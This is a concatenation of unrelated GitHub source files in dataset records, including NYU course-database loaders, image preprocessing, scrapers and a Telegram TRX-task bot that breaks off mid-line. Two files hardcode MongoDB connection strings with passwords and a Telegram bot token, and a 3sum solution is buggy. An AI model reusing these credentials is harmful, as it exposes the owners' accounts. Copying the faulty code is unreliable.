https://www.synapse.org/#!Synapse:%s\" % prediction_synId\n message = \"Your prediction file has been stored, but you will not have access to it.\"\n else:\n if config['returnLog']:\n message = \"No prediction file generated, please check your log file: https://www.synapse.org/#!Synapse:%s\" % log_synId\n else:\n message = \"No prediction file generated, please submit to the express lanes to debug your model!\"\n\n return (dict(PREDICTION_FILE=prediction_synId, LOG_FILE = log_synId), message)\n\n","repo_name":"Sage-Bionetworks-Challenges/NCI-CPTAC-DREAM-Proteogenomics-Challenge","sub_path":"Subchallenges_2_3/challenge_administration/docker/docker_challenge_config.py","file_name":"docker_challenge_config.py","file_ext":"py","file_size_in_byte":12793,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"40"} +{"seq_id":"5811821246","text":"import pymongo\nimport csv\nimport json\nimport re\nclient = pymongo.MongoClient(\n \"mongodb+srv://kaixuan:happycoding@courseapi-ujwvo.mongodb.net/nyu?retryWrites=true&w=majority\")\ndb = client[\"nyu\"]\n\ncourses = []\nsections = []\nteaches = []\nprofessors = []\n\ndef tokenize(query):\n return ' '.join(re.sub('[^A-Za-z0-9 ]+', '', query).split())\n\ndef dewhitespace(query):\n return ''.join(query.split())\n\n# course_id,course_name,section_id,session,days/times,dates,instructor,status\n# course_id,course_name,section,topic,session,daystimes,dates,instructor,status\ndef getData(filename):\n print('getting data from', filename)\n with open(filename, 'r') as f:\n reader = csv.DictReader(f, quotechar='¥', delimiter=',', quoting=csv.QUOTE_ALL, skipinitialspace=True)\n header = next(reader)\n\n for row in reader:\n\n temp = row['course_name'].split(\"-\", 2)\n # print(temp)\n course_id = temp[0] + temp[1].rstrip()\n\n course_title = temp[2].lstrip()\n\n if row['topic'] != '':\n course_title += \" \" + row['topic']\n\n temp = row['section'].split(\" (\")\n t = temp[0].split('-')[1]\n section = temp[0]\n\n course_title = course_title + \" \" + t\n class_no = temp[1][:-1]\n if filename == 'course_num_fall_2020.csv':\n term = \"Fall 2020\"\n if filename == 'course_num_fall.csv':\n term = \"Fall 2019\"\n if filename == 'course_num_spring.csv':\n term = \"Spring 2020\"\n\n days_times = row['days/times']\n dates = row['dates']\n session = row['session']\n status = row['status']\n\n instructors = row['instructor'].split(\", \")\n\n curr_course = {\n 'courseID': course_id,\n 'courseTitle': course_title\n }\n if curr_course not in courses:\n courses.append(curr_course)\n\n for instructor in instructors:\n\n curr_prof = {\n 'name': instructor,\n 'firstname': instructor.split(' ')[0],\n 'lastname': instructor.split(' ')[-1]\n }\n\n if curr_prof not in professors:\n professors.append(curr_prof)\n\n curr_sec = {\n 'courseID': course_id,\n 'courseTitle': course_title,\n 'classNo': class_no,\n 'term': term,\n 'daystimes': days_times,\n 'dates': dates,\n 'session': session,\n 'section': section,\n 'professor': instructor,\n 'status': status\n }\n\n sections.append(curr_sec)\n\n curr_teach = {\n 'courseID': course_id,\n 'courseTitle': course_title,\n 'professor': instructor\n }\n\n if curr_teach not in teaches:\n teaches.append(curr_teach)\n\nrmp = {}\nnotFoundCount = 0\ntotalCount = 0\ndef getRMP(filename):\n global notFoundCount\n global totalCount\n print('getting data from', filename)\n with open(filename, 'r') as f:\n data = json.load(f)\n for rating in data:\n if rating['wouldTakeAgain'] == \"\":\n wouldTakeAgain = \"N/A\"\n else:\n wouldTakeAgain = rating['wouldTakeAgain'] + \"%\"\n\n if rating['score'] == 'N/A':\n rating['score'] = '0'\n \n if rating['levelOfDifficulty'] == '':\n rating['levelOfDifficulty'] = '0'\n\n if rating['numRating'] == '':\n rating['numRating'] = '0'\n\n rmp[rating['name']] = {\n \"name\": rating['name'],\n \"rscore\": float(rating['score']),\n \"rnumRate\": int(rating['numRating']),\n \"department\": rating['department'],\n \"wouldTakeAgain\": wouldTakeAgain,\n \"levelOfDifficulty\": float(rating['levelOfDifficulty']),\n \"tags\": rating['tags']\n }\n\n # print(rmp[rating['name']])\n\n print('combine data from rmp')\n\n \n for name in rmp:\n fname = name.split(' ')[0]\n lname = name.split(' ')[-1]\n\n rating = rmp[name]\n found = False\n for prof in professors:\n if prof['firstname'] == fname and prof['lastname'] == lname:\n prof[\"rscore\"] = rating['rscore']\n prof[\"rnumRate\"] = rating['rnumRate']\n prof[\"department\"] = rating['department']\n prof[\"wouldTakeAgain\"] = rating['wouldTakeAgain']\n prof[\"levelOfDifficulty\"] = rating['levelOfDifficulty']\n prof[\"tags\"] = rating['tags']\n \n found = True\n break\n\n\n if not found:\n notFoundCount += 1\n # print(name)\n # print(name, prof['name'])\n totalCount += 1\n\n\n\ngetData(\"course_num_fall.csv\")\ngetData(\"course_num_spring.csv\")\ngetData(\"course_num_fall_2020.csv\")\n\ngetRMP(\"rmp/RMPdata.json\")\n\n# print(professors)\nprint(notFoundCount, totalCount)\n\n\nfor i in range(len(courses)):\n courses[i]['numRate'] = 0\n courses[i]['score'] = 0\n courses[i]['_total'] = tokenize(courses[i]['courseID'] + \" \" + courses[i]['courseTitle'])\n courses[i]['_total_concat'] = dewhitespace(courses[i]['_total'])\n\nfor i in range(len(professors)):\n professors[i]['numRate'] = 0\n professors[i]['score'] = 0\n\n\n# _total = tokenize(course_id + \" \" + course_title)\n# 'numRate': 0,\n# 'score': 0,\n# '_total': _total,\n# '_total_concat': dewhitespace(_total)\n\n\n\n# 'score': 0,\n# 'numRate': 0\n# 'rscore': 0,\n# 'rnumRate': 0,\n# 'rtags': [],\n# 'department': '',\n# 'wouldTakeAgain': '',\n# 'levelOfDifficulty': ''\n\ndb['sections'].drop()\ndb['courses'].drop()\ndb['teaches'].drop()\ndb['professors'].drop()\ndb['sections'].insert_many(sections)\ndb['courses'].insert_many(courses)\ndb['teaches'].insert_many(teaches)\ndb['professors'].insert_many(professors)\n","repo_name":"ChenZ0912/GoBert","sub_path":"data/filled_db.py","file_name":"filled_db.py","file_ext":"py","file_size_in_byte":6153,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"40"} +{"seq_id":"7052290530","text":"from setuptools import setup\nfrom pathlib import Path\nfrom cmake_build_extension import BuildExtension, CMakeExtension\n\ndatadir = Path(__file__).parent / 'python/flexflow'\nfiles = [str(p.relative_to(datadir)) for p in datadir.rglob('*.py')]\n\nsetup(\n name='flexflow',\n version='1.0',\n description='FlexFlow Python package',\n url='https://github.com/flexflow/FlexFlow',\n license='Apache',\n packages=['flexflow'],\n package_data={'flexflow': files},\n zip_safe= False,\n install_requires=['numpy>=1.16',\n 'cffi>=1.11',\n 'qualname',\n 'keras_preprocessing',\n 'Pillow',\n 'cmake-build-extension',\n 'pybind11'\n ],\n ext_modules=[\n CMakeExtension(name='flexflow',\n install_prefix='flexflow',\n cmake_configure_options=[\n '-DCUDA_USE_STATIC_CUDA_RUNTIME=OFF -DCUDA_PATH=/projects/opt/centos7/cuda/10.1 -DCUDNN_PATH=/projects/opt/centos7/cuda/10.1 -DFF_USE_PYTHON=ON -DFF_USE_NCCL=OFF -DFF_USE_GASNET=OFF -DFF_BUILD_EXAMPLES=OFF -DFF_USE_AVX2=OFF -DFF_MAX_DIM=4',\n ]),\n ],\n cmdclass=dict(build_ext=BuildExtension),\n classifiers=[\n 'Programming Language :: Python :: 3.6',\n 'License :: OSI Approved :: Apache Software License',\n 'Operating System :: POSIX :: Linux',\n 'Topic :: Software Development :: Libraries',\n ],\n python_requires='>=3.6',\n)\n","repo_name":"merrymercy/FlexFlow","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1476,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"40"} +{"seq_id":"39571213574","text":"import re\n\nimport pandas as pd\n\n\nclass CompoundMatch:\n # ORF_ID\n # A_domain_Idx\n # Prediction_DL - config (not used)\n # Prediction_Top_Residue\n # Prediction_Top_Score\n # Prediction_Modifications\n # Matched_Residue\n # Matched_Residue_Score\n # Nerpa_Score\n # Monomer_Idx\n # Monomer_Code\n # Monomer_DL - config (not used)\n # Monomer_Residue\n # Monomer_Modifications\n def __init__(self, orf_id: str, a_domain_id: int, genome_acid: str,\n genome_score: int, genome_modification: str,\n graph_acid: str, graph_score: int,\n nerpa_score: float, rban_graph_id: int,\n rban_acid_code: str, rban_acid: str,\n rban_modification: str):\n self.orf_id = orf_id\n self.a_domain_id = a_domain_id\n self.genome_acid = genome_acid\n self.genome_score = genome_score\n self.genome_modification = genome_modification\n self.graph_acid = graph_acid\n self.graph_score = graph_score\n self.nerpa_score = nerpa_score\n self.rban_graph_id = rban_graph_id\n self.rban_acid_code = rban_acid_code\n self.rban_acid = rban_acid\n self.rban_modification = rban_modification\n\n @staticmethod\n def from_dataframe_row(row):\n return CompoundMatch(\n orf_id=row['ORF_ID'],\n a_domain_id=int(row['A_domain_Idx']),\n genome_acid=row['Prediction_Top_Residue'],\n genome_score=int(row['Prediction_Top_Score']),\n genome_modification=row['Prediction_Modifications'],\n graph_acid=row['Matched_Residue'],\n graph_score=int(row['Matched_Residue_Score']),\n nerpa_score=float(row['Nerpa_Score']),\n rban_graph_id=int(row['Monomer_Idx']),\n rban_acid_code=row['Monomer_Code'],\n rban_acid=row['Monomer_Residue'],\n rban_modification=row['Monomer_Modifications'],\n )\n\n\ndef parse_compound_match(match_file_content: str):\n match_file_content = match_file_content.strip()\n matches = list(map(lambda x: x.strip(), match_file_content.split('\\n\\n\\n')))\n\n max_score = None\n top_df = None\n top_name = None\n\n dfs = []\n bgcs = []\n scores = []\n\n for m in matches:\n match_lines = m.split('\\n')\n compound_name = match_lines[0]\n predictors_path = match_lines[1]\n bgc = \"BGC\" + re.findall(\"BGC([0-9]*)_\", predictors_path)[0]\n\n score = float(match_lines[2].strip().split(' ')[-1])\n alignment = match_lines[3]\n tsv_report = '\\n'.join(match_lines[4:])\n df = pd.DataFrame([x.split(' ') for x in tsv_report.split('\\n')[1:]],\n columns=tsv_report.split('\\n')[0].split(' '))\n dfs.append(df)\n bgcs.append(bgc)\n scores.append(score)\n\n return dfs, bgcs, scores\n","repo_name":"pavlov200912/nrp-generation","sub_path":"domain/match/compound_match.py","file_name":"compound_match.py","file_ext":"py","file_size_in_byte":2853,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"38907800395","text":"import sys\r\n\r\nimport tweepy\r\nfrom unshortenit import UnshortenIt\r\n\r\nconsumer_key = \"\"\r\nconsumer_secret = \"\"\r\naccess_key = \"\"\r\naccess_secret = \"\"\r\n\r\n#method to get a user's last tweets\r\ndef get_tweets(username):\r\n\r\n\tauth = tweepy.OAuthHandler(consumer_key, consumer_secret)\r\n\tauth.set_access_token(access_key, access_secret)\r\n\tapi = tweepy.API(auth)\r\n\r\n\t#set count to however many tweets you want\r\n\tnumber_of_tweets = 500\r\n\r\n\t#get tweets\r\n\tfor tweet in tweepy.Cursor(api.user_timeline, screen_name = username).items(number_of_tweets):\r\n #create array of tweet information: username, tweet id, date/time, text\r\n\t\tif(\"https://t.co/\" in tweet.text):\r\n\t\t\tindex = (tweet.text).index('https://t.co')\r\n\t\t\tt_url = (tweet.text)[index:(index+24)]\r\n\t\t\tunshortener = UnshortenIt()\r\n\t\t\turl = unshortener.unshorten(t_url)\r\n\t\t\tif(\"open.spotify\" in url):\r\n\t\t\t\tprint(url)\r\n\t\t\t#print(url)\r\n\t\t#print (tweet.text)\r\n\r\n#if we're running this as a script\r\nif __name__ == '__main__':\r\n\r\n #get tweets for username passed at command line\r\n if len(sys.argv) == 2:\r\n get_tweets(sys.argv[1])\r\n else:\r\n print (\"Error: enter one username\")\r\n","repo_name":"hhptl/spotify-tweets","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":1139,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"7842171305","text":"# This example shows how to read tile file from Sentinel 2 bucket\n# and show it\n\nimport matplotlib.pyplot as plt\nimport matplotlib.image as mpimg\nimport numpy as np\nimport boto3\nimport mgrs\nimport re\nfrom PIL import Image\n\nImage.MAX_IMAGE_PIXELS = 1000000000\n\ns3 = boto3.resource('s3', region_name='us-east-2')\n\nlongitude = 37.593947\nlatitude = 55.731979\n\nm = mgrs.MGRS()\n\nmgrs = m.toMGRS(latitude, longitude).decode('cp1252')\n\ns = re.search('(\\d+)([^\\d])([^\\d]{2})(\\d{5})(\\d{5})', mgrs)\n\nUTM = s.group(1)\nLatitudeBand = s.group(2)\nSquare = s.group(3)\n\nbucket = s3.Bucket('sentinel-s2-l1c')\n\ntilesdir = 'tiles/' + UTM + '/'+ LatitudeBand + '/' + Square + '/'\n\ndatestring = '2017/5/10/0/'\n\nfilename = 'tileInfo.json'\nobject = bucket.Object(tilesdir + datestring + filename)\nobject.download_file(filename)\n\nfilename = 'metadata.xml'\nobject = bucket.Object(tilesdir + datestring + filename)\nobject.download_file(filename)\n\nfilename = 'B02.jp2'\nobject = bucket.Object(tilesdir + datestring + filename)\nobject.download_file(filename)\n\nfilename = 'B03.jp2'\nobject = bucket.Object(tilesdir + datestring + filename)\nobject.download_file(filename)\n\nfilename = 'B04.jp2'\nobject = bucket.Object(tilesdir + datestring + filename)\nobject.download_file(filename)\n\n\nimg_blue = np.divide(mpimg.imread('B02.jp2'), 65535)\nimg_green = np.divide(mpimg.imread('B03.jp2'), 65535)\nimg_red = np.divide(mpimg.imread('B04.jp2'), 65535)\nimg = np.dstack((img_red,img_green,img_blue))\n\n\nimgplot = plt.imshow(img)\nplt.show(imgplot)\n\npass","repo_name":"dims12/Sentinel2-Approach01","sub_path":"tries/try06.py","file_name":"try06.py","file_ext":"py","file_size_in_byte":1507,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"69856347961","text":"# https://leetcode.com/problems/3sum/\n\ndef threeSum(nums):\n # Sorting the numbers makes this easier.\n nums.sort()\n for i in range(len(nums)):\n a = nums[i]\n # If the index is not the first index, check if the one before it is the same value.\n # If it is, that means we can skip this loop because we already did the calculation\n if i > 0 and nums[i - 1] == a:\n continue\n\n # Create two pointers, one starting at the next number, the other starting at the end of the array.\n l = i + 1\n r = len(nums)\n # While the left is always less than the right...\n while l < r:\n # Get the values at l and r and add them with the current num\n b = nums[l]\n c = nums[r]\n s = a + b + c\n # If the sum is 0 we have a hit, so we can add it to the result array if it's not already in there.\n if s == 0:\n if [a, b, c] not in res:\n res.append([a, b, c])\n # If the sum is too big, we decrement the right side by one\n elif s > 0:\n r -= 1\n # Too small, we increase l by one\n else:\n l += 1\n return res\n\n\nn = [-1, 0, 1, 2, -1, -4]\nres = threeSum(n)\nprint(res)\n","repo_name":"juggernautrises/grindcode","sub_path":"python/15_3sum.py","file_name":"15_3sum.py","file_ext":"py","file_size_in_byte":1292,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"41051999400","text":"import json\nimport logging\nimport os\nimport time\nfrom pathlib import Path\nfrom reddit_service import praw_service as praw\nfrom reddit_resource import subreddits as subs\nfrom producer import publish_stock\n\nlogging.basicConfig(level=logging.DEBUG)\n\ndef test_1_scan():\n reddit = praw.praw_connection()\n subreddit = subs.subreddit_list()[0]\n top25Submissions = []\n top25 = reddit.subreddit(subreddit).hot(limit=25)\n for submission in top25:\n if submission.stickied:\n continue\n comments = []\n curr = reddit.submission(submission)\n curr.comments.replace_more(limit=1, threshold=0)\n for comment in curr.comments.list(): # Create a list of all comments to eliminate hierarchy\n comments.append({\n \"comment_author\": comment.author_fullname if hasattr(comment, 'author_fullname') else \"null\",\n \"body\": comment.body,\n \"created_utc\": comment.created_utc,\n \"edited\": comment.edited,\n \"id\": comment.id,\n \"is_root\": comment.is_root,\n \"is_submitter\": comment.is_submitter,\n \"permalink\": comment.permalink,\n \"score\": comment.score,\n \"ups\": comment.ups\n })\n top25Submissions.append({\n \"id\": submission.id,\n \"title\": submission.title,\n \"flair\": submission.link_flair_text,\n \"subreddit\": submission.subreddit_name_prefixed,\n \"created_utc\": submission.created_utc,\n \"upvote\": submission.ups,\n \"score\": submission.score,\n \"upvote_ratio\": submission.upvote_ratio,\n \"self_text\": submission.selftext,\n \"self_url\": submission.url,\n \"permalink\": submission.permalink,\n \"shortlink\": submission.shortlink,\n \"author\": submission.author_fullname if hasattr(submission, 'author_fullname') else \"null\",\n \"comment_count\": submission.num_comments,\n \"comments\": comments\n })\n publish_stock(top25Submissions, '','scraped_data')\n create_submission_json(top25Submissions, subreddit)\n break\n\n\ndef create_submission_json(submissions: list, subreddit):\n path = \"../data_collected/reddit/\" + subreddit\n file = str(time.time()) + \".json\"\n Path(path).mkdir(parents=True, exist_ok=True)\n\n with open(os.path.join(path, file), \"w\") as f:\n json.dump(submissions, f)\n\n os.remove(path + \"/\" + file)\n\ntest_1_scan()\n","repo_name":"Sentmint/CrawlScrape","sub_path":"reddit/testing/reddit_test.py","file_name":"reddit_test.py","file_ext":"py","file_size_in_byte":2518,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"40"} +{"seq_id":"24895162839","text":"import os\nimport random\n\nimport cv2\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport torch\nfrom tqdm import tqdm\n\n\ndef process_isic(\n dim=(352, 352),\n save_dir=\"./processed/isic2016\",\n image_dir_path=\"./dataset/isic2016/ISBI2016_ISIC_Part1_Training_Data\",\n mask_dir_path=\"./dataset/isic2016/ISBI2016_ISIC_Part1_Training_GroundTruth\",\n save_as_npy=True,\n):\n\n image_path_list = os.listdir(image_dir_path)\n mask_path_list = os.listdir(mask_dir_path)\n\n image_path_list = list(filter(lambda x: x[-3:] == \"jpg\", image_path_list))\n mask_path_list = list(filter(lambda x: x[-3:] == \"png\", mask_path_list))\n\n image_path_list.sort()\n mask_path_list.sort()\n\n print(len(image_path_list), len(mask_path_list))\n\n # ISBI Dataset\n for image_path, mask_path in tqdm(zip(image_path_list, mask_path_list)):\n if image_path[-3:] == \"jpg\":\n # print(image_path)\n assert (\n os.path.basename(image_path)[:-4].split(\"_\")[1]\n == os.path.basename(mask_path)[:-4].split(\"_\")[1]\n )\n _id = os.path.basename(image_path)[:-4].split(\"_\")[1]\n image_path = os.path.join(image_dir_path, image_path)\n mask_path = os.path.join(mask_dir_path, mask_path)\n image = cv2.imread(image_path)\n mask = cv2.imread(mask_path)\n\n image_new = cv2.resize(image, dim, interpolation=cv2.INTER_CUBIC)\n image_new = np.array(image_new, dtype=np.uint8)\n mask_new = cv2.resize(mask, dim, interpolation=cv2.INTER_NEAREST)\n mask_new = cv2.blur(mask_new, (3, 3))\n mask_new = cv2.cvtColor(mask_new, cv2.COLOR_BGR2GRAY)\n # mask_new = np.array(mask_new, dtype=np.uint8)\n\n save_dir_path_image = save_dir + \"/Image\"\n os.makedirs(save_dir_path_image, exist_ok=True)\n\n save_dir_path_mask = save_dir + \"/Label\"\n os.makedirs(save_dir_path_mask, exist_ok=True)\n\n # #print(image_new.shape)\n if save_as_npy:\n np.save(os.path.join(save_dir_path_image, _id + \".npy\"), image_new)\n np.save(os.path.join(save_dir_path_mask, _id + \".npy\"), mask_new)\n else:\n cv2.imwrite(\n os.path.join(save_dir_path_image, \"ISIC_\" + _id + \".jpg\"), mask_new\n )\n cv2.imwrite(\n os.path.join(save_dir_path_mask, \"ISIC_\" + _id + \".jpg\"), image_new\n )\n\n\ndef process_ph2():\n PH2_images_path = \"/data2/cf_data/skinlesion_segment/PH2_rawdata/PH2_Dataset_images\"\n\n path_list = os.listdir(PH2_images_path)\n path_list.sort()\n\n for path in path_list:\n image_path = os.path.join(\n PH2_images_path, path, path + \"_Dermoscopic_Image\", path + \".bmp\"\n )\n label_path = os.path.join(\n PH2_images_path, path, path + \"_lesion\", path + \"_lesion.bmp\"\n )\n image = plt.imread(image_path)\n label = plt.imread(label_path)\n label = label[:, :, 0]\n\n dim = (512, 512)\n image_new = cv2.resize(image, dim, interpolation=cv2.INTER_AREA)\n label_new = cv2.resize(label, dim, interpolation=cv2.INTER_AREA)\n\n image_save_path = os.path.join(\n \"/data2/cf_data/skinlesion_segment/PH2_rawdata/PH2/Image\", path + \".npy\"\n )\n label_save_path = os.path.join(\n \"/data2/cf_data/skinlesion_segment/PH2_rawdata/PH2/Label\", path + \".npy\"\n )\n\n np.save(image_save_path, image_new)\n np.save(label_save_path, label_new)\n\n\nif __name__ == \"__main__\":\n process_isic(\n dim=(512, 512),\n save_dir=\"./processed/isic2016/Train\",\n image_dir_path=\"./dataset/isic2016/ISBI2016_ISIC_Part1_Training_Data\",\n mask_dir_path=\"./dataset/isic2016/ISBI2016_ISIC_Part1_Training_GroundTruth\",\n )\n process_isic(\n dim=(512, 512),\n save_dir=\"./processed/isic2016/Test\",\n image_dir_path=\"./dataset/isic2016/ISBI2016_ISIC_Part1_Training_Data\",\n mask_dir_path=\"./dataset/isic2016/ISBI2016_ISIC_Part1_Training_GroundTruth\",\n )\n process_isic(\n dim=(512, 512),\n save_dir=\"./processed/isic2016/Validation\",\n image_dir_path=\"./dataset/isic2016/ISBI2016_ISIC_Part1_Training_Data\",\n mask_dir_path=\"./dataset/isic2016/ISBI2016_ISIC_Part1_Training_GroundTruth\",\n )\n","repo_name":"HiroForYou/Vision-2-Transformers","sub_path":"ViT-to-melanoma/src/process_resize.py","file_name":"process_resize.py","file_ext":"py","file_size_in_byte":4391,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"40"} +{"seq_id":"24878474078","text":"from collections import Counter \n\nclass MyCounter:\n\n @classmethod\n def main(cls,args):\n seq = [1,1,2,2,3,3,4,4,4,4]\n\n mycounter = Counter(seq)\n\n print(mycounter)\n print(mycounter.get(3))\n \n mycounter.pop(4)\n print(4 in mycounter)\n\n mycounter[5] += 1\n mycounter[5] += 1\n\n print(mycounter)\n\nif __name__ == '__main__':\n import sys\n MyCounter.main(sys.argv)\n","repo_name":"natcobbinah/Python_prog","sub_path":"python_problem_solving - Hermant Jain/dsa/counter.py","file_name":"counter.py","file_ext":"py","file_size_in_byte":435,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"27297800902","text":"def isValid(s):\n hist = [0] * (ord('z') - ord('a') + 1)\n for c in s:\n hist[ord(c)-ord('a')] += 1\n hist = [n for n in hist if n > 0]\n\n d = dict()\n for h in hist:\n if (d.get(h) is None):\n d[h] = 1\n else:\n d[h] += 1\n\n keys = list(d.keys())\n if (len(keys) == 1):\n return \"YES\"\n elif (len(keys) > 2):\n return \"NO\"\n else:\n if ((keys[1] == keys[0] + 1) and (d[keys[1]] == 1)):\n return \"YES\"\n elif ((keys[0] == 1) and (d[keys[0]] == 1)):\n return \"YES\"\n else:\n return \"NO\"\n","repo_name":"larumbe/challenges","sub_path":"hackerrank/interview/sherlock.py","file_name":"sherlock.py","file_ext":"py","file_size_in_byte":602,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"40917289731","text":"import json, csv,sys\n\nOUT = sys.argv[1] if len(sys.argv) > 1 else \"stages.csv\"\nLIMIT = int(sys.argv[2]) if len(sys.argv) > 2 else None\n\ndetails = json.load(open('data/enriched.json'))\n\nprint('files loaded')\n\ndata = details\n\n######## STAGES.CSV\n\nout = open('data/'+OUT, 'w', newline='')\nw = csv.writer(out)\n\nheader = list(sorted(data[0].keys()))\nprint(header)\nw.writerow(header)\n\ndef get(s, key):\n if key in ('done','confidentiel'):\n return 'x' if s[key] else ''\n return s.get(key)\n\nfor i,attrs in enumerate(data):\n if LIMIT and i > LIMIT:\n break\n w.writerow([get(attrs,x) for x in header])\n\nprint(\"stages.csv done\")","repo_name":"mdamien/internships","sub_path":"extraction/make_csv.py","file_name":"make_csv.py","file_ext":"py","file_size_in_byte":641,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"40"} +{"seq_id":"1554229126","text":"# This is a sample Python script.\r\n\r\n# Press Shift+F10 to execute it or replace it with your code.\r\n# Press Double Shift to search everywhere for classes, files, tool windows, actions, and settings.\r\nimport random\r\nimport pymongo\r\nimport telegram\r\nfrom telegram.ext import *\r\nfrom telegram import ReplyKeyboardMarkup , InlineKeyboardMarkup , InlineKeyboardButton\r\n\r\nclient = pymongo.MongoClient(\"mongodb+srv://pugalkmc:pugalkmc@cluster0.ey2yh.mongodb.net/mydb?retryWrites=true&w=majority\")\r\nmydb = client.get_default_database()\r\n\r\nbot = telegram.Bot(token=\"5394324389:AAGvCQN8ogbnwj1MStLHmvu7Kb9e3uQiF_4\")\r\n\r\ndef main_buttons(update, context):\r\n reply_keyboard = [['Do Task💸', '', 'Create Task📜'], ['Balance⚖', 'Deposit➕'], ['Referal link📎', 'More❕']]\r\n\r\n update.message.reply_text(\"Main Menu\",\r\n reply_markup=ReplyKeyboardMarkup(reply_keyboard, resize_keyboard=True,\r\n one_time_keyboard=True))\r\n\r\n\r\ndef start(update, context):\r\n sender = update.message.reply_text\r\n chat_id = update.message.chat_id\r\n username = update.message.chat.username\r\n text = update.message.text\r\n if str(username) == \"None\":\r\n sender(\"No username found for your account\")\r\n sender(\"Please set username for your telegram\\n1)Go telegram account settings\\n2)Click username\\n3)Set unique and simplified username\")\r\n else:\r\n checking_exist = mydb[\"people\"]\r\n bot.sendMessage(chat_id=chat_id, text =\"This KMC TRX earning bot\"\r\n \"\\nYou can earn TRX by doing tasks\"\r\n \"\\nAlso You can create task for other to do\")\r\n\r\n main_buttons(update, context)\r\n for i in checking_exist.find({}):\r\n if username == i[\"username\"]:\r\n break\r\n else:\r\n rand_num = random.randrange(11023648,12023648)\r\n rand_text = random.choice('qwertyuiopasfghjklzxcvbnm')\r\n link = \"https://telegram.me/earn_trx_ind_bot?start=\"+str(rand_num)+rand_text\r\n checking_exist.insert_one({\"_id\": chat_id, \"username\": username , \"referal\":link , \"ref_count\":0})\r\n bot.sendMessage(chat_id=1291659507, text=\"New user found @\" + str(username))\r\n referal(text, username)\r\n\r\ndef referal(text , username):\r\n referal = text.replace(\"/start \", '')\r\n if len(referal) > 0:\r\n ref = mydb[\"people\"]\r\n link = \"https://telegram.me/earn_trx_ind_bot?start=\"+str(referal)\r\n try:\r\n get = ref.find_one({\"referal\": link})\r\n get_invitee = get[\"_id\"]\r\n get_count = get[\"ref_count\"]\r\n ref.update_one({\"_id\": get_invitee}, {\"$set\": {\"ref_count\": get_count+1}})\r\n bot.sendMessage(chat_id=get_invitee, text=f\"You got new referal: @{username}\")\r\n except:\r\n get = ref.find_one({\"referal\":\"https://telegram.me/earn_trx_ind_bot?start=11299293i\"})\r\n get_invitee = get[\"_id\"]\r\n get_count = get[\"ref_count\"]\r\n ref.update_one({\"_id\": get_invitee}, {\"$set\": {\"ref_count\": get_count+1}})\r\n\r\ndef msg_hand(update, context):\r\n chat_id = update.message.chat_id\r\n username = update.message.chat.username\r\n sender = update.message.reply_text\r\n text = update.message.text\r\n if 'Do Task💸' == text:\r\n task_list(update, context)\r\n elif 'Create Task📜' == text:\r\n pass\r\n elif 'Balance⚖' == text:\r\n pass\r\n elif 'Deposit➕' == text:\r\n bot.sendMessage(\"This is deposit option\")\r\n elif 'Referal link📎' == text:\r\n get_link = mydb['people']\r\n get = get_link.find_one({\"_id\":chat_id})\r\n bot.sendMessage(chat_id=chat_id, text=f\"Your referal link:\\n{get['referal']}\")\r\n elif \"Withdraw➕\" == text:\r\n pass\r\n\r\n if text == \"More❕\":\r\n reply_keyboard = [[\"Rules\", \"About\"], [\"Rank\", \"Support\"], [\"Withdraw➕\",\"Back↩\"]]\r\n update.message.reply_text(\"Use below buttons for quick access\",\r\n reply_markup=ReplyKeyboardMarkup(reply_keyboard, resize_keyboard=True,\r\n one_time_keyboard=True))\r\n elif text == \"Back↩\":\r\n # update.message.reply_text(text = 'test')\r\n main_buttons(update, context)\r\n\r\n\r\ndef do_task(update, context):\r\n text = update.message.text\r\n text = text.replace(\"/\",'')\r\n find_task = mydb[\"tasks\"]\r\n get = find_task.find_one({\"cmd_id\":text})\r\n keyboard = [\r\n [InlineKeyboardButton(\"Send Proof📥\", callback_data=f\"{get['cmd_id']}\")],\r\n [InlineKeyboardButton(\"Skip⏩\", callback_data=\"skip\")]\r\n ]\r\n reply_markup = InlineKeyboardMarkup(keyboard, one_time_keyboard=True , resize_keyboard=True)\r\n bot.sendMessage(chat_id = update.message.chat_id, text = f\"Task id : /{get['cmd_id']}\\n\"\r\n f\"Title: {get['title']}\\n\"\r\n f\"Reward: {get['reward']} TRX\\n\", reply_markup=reply_markup)\r\n\r\n return SELECTING_COMMAND\r\n\r\ndef task_list(update , context):\r\n chat_id = update.message.chat_id\r\n tasks_list = mydb[\"tasks\"]\r\n list1 = []\r\n total = 0\r\n for i in tasks_list.find({}):\r\n total += 1\r\n text = f\"Task No: {total}\\n\" \\\r\n f\"Title: {i['title']}\\n\" \\\r\n f\"Reward: {i['reward']} TRX\\n\" \\\r\n f\"Task id : /{i['cmd_id']}\"\r\n list1.append(text)\r\n\r\n update.message.reply_text(\"Total task found:{0}\\n\\n{1}\\n\\n\".format(total, '\\n'.join(x for x in list1)))\r\n\r\n\r\nSELECTING_COMMAND = 1\r\n\r\ndef inline(update, CallbackContext):\r\n print(\"clicked\")\r\n button_text = update.callback_query.data\r\n if button_text == \"skip\":\r\n pass\r\n else:\r\n update.effective_message.reply_text(\"Now send your task proof\")\r\n# bot.answer_callback_query(callback_query_id=call.id, text='you disliked it!')\r\n return 1\r\n\r\ndef com():\r\n tasks_list = mydb[\"tasks\"]\r\n task = [\"empty\"]\r\n for i in tasks_list.find({}):\r\n task.append(i[\"cmd_id\"])\r\n return task\r\n\r\ndef main():\r\n updater = 